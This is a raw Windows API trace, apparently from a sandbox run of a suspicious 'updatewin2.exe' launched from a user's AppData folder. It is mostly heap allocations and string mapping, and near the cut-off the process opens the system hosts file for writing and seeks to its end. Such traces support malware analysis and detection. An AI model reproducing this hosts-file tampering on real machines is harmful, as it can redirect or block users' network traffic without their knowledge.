\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0081.527] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0081.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿK@\x97·`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0081.527] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x80) returned 0x5aa3e8 [0081.527] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe")) returned 0x5f [0081.527] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xc8) returned 0x5ac478 [0081.527] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0081.527] GetLastError () returned 0x0 [0081.529] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0081.529] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0081.627] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0081.628] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1423) returned 0x5aeaf8 [0081.628] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1423) returned 0x5aff28 [0081.628] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac118 [0081.628] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x5ad5d0 [0081.628] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac140 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x30) returned 0x595490 [0081.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad5d0 | out: hHeap=0x580000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac168 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x48) returned 0x5ad5d0 [0081.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x595490 | out: hHeap=0x580000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac190 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x60) returned 0x5ad620 [0081.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad5d0 | out: hHeap=0x580000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x90) returned 0x5ad688 [0081.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad620 | out: hHeap=0x580000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac1b8 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xd8) returned 0x5ad720 [0081.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad688 | out: hHeap=0x580000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac1e0 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac208 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x138) returned 0x5ad5d0 [0081.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad720 | out: hHeap=0x580000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac230 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac258 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac280 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac2a8 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1c8) returned 0x5ad710 [0081.629] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad5d0 | out: hHeap=0x580000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac2d0 [0081.629] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac2f8 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac320 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac348 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a0) returned 0x5b1358 [0081.630] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad710 | out: hHeap=0x580000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac370 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac398 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac3c0 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac3e8 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac410 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5ac438 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1618 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1640 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x3f0) returned 0x5ad5d0 [0081.630] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1358 | out: hHeap=0x580000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1668 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1690 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b16b8 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b16e0 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1708 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1730 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1758 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1780 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b17a8 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x5e8) returned 0x5b1e00 [0081.630] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ad5d0 | out: hHeap=0x580000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b17d0 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b17f8 [0081.630] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1820 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1848 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1870 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1898 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b18c0 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b18e8 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1910 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1938 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x8d0) returned 0x5b23f0 [0081.631] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1e00 | out: hHeap=0x580000) returned 1 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1960 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1988 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b19b0 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b19d8 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1a00 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1a28 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1a50 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1a78 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1aa0 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1ac8 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1af0 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1b18 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1b40 [0081.631] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1b68 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1b90 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1bb8 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xd38) returned 0x5b2cc8 [0081.632] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b23f0 | out: hHeap=0x580000) returned 1 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1be0 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1c08 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1c30 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1c58 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1c80 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1ca8 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1cd0 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1cf8 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1d20 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1d48 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1d70 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1d98 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1dc0 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1e18 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1e40 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1e68 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1e90 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1eb8 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1ee0 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1f08 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1f30 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1f58 [0081.632] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1f80 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1fa8 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1fd0 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b1ff8 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2020 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2048 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x13eb) returned 0x5b3a08 [0081.633] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2cc8 | out: hHeap=0x580000) returned 1 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2070 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2098 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b20c0 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b20e8 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x30) returned 0x595490 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2110 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2138 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2160 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2188 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b21b0 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b21d8 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2200 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2228 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2250 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2278 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b22a0 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b22c8 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b22f0 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2318 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2340 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2368 [0081.633] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2390 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b23b8 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b23e0 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2408 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2430 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2458 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2480 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b24a8 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b24d0 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b24f8 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2520 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2548 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2570 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2598 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b25c0 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2618 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1dc3) returned 0x5b4e00 [0081.634] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b3a08 | out: hHeap=0x580000) returned 1 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2640 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2668 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2690 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b26b8 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b26e0 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2708 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2730 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2758 [0081.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2780 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b27a8 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b27d0 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b27f8 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2820 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2848 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2870 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2898 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b28c0 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b28e8 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2910 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2938 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2960 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2988 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b29b0 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b29d8 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2a00 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2a28 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2a50 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2a78 [0081.635] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x20) returned 0x5b2aa0 [0081.635] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5aff28 | out: hHeap=0x580000) returned 1 [0081.635] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0081.651] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0081.651] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0081.652] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0081.652] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0081.652] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x30) returned 0x595500 [0081.652] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x47) returned 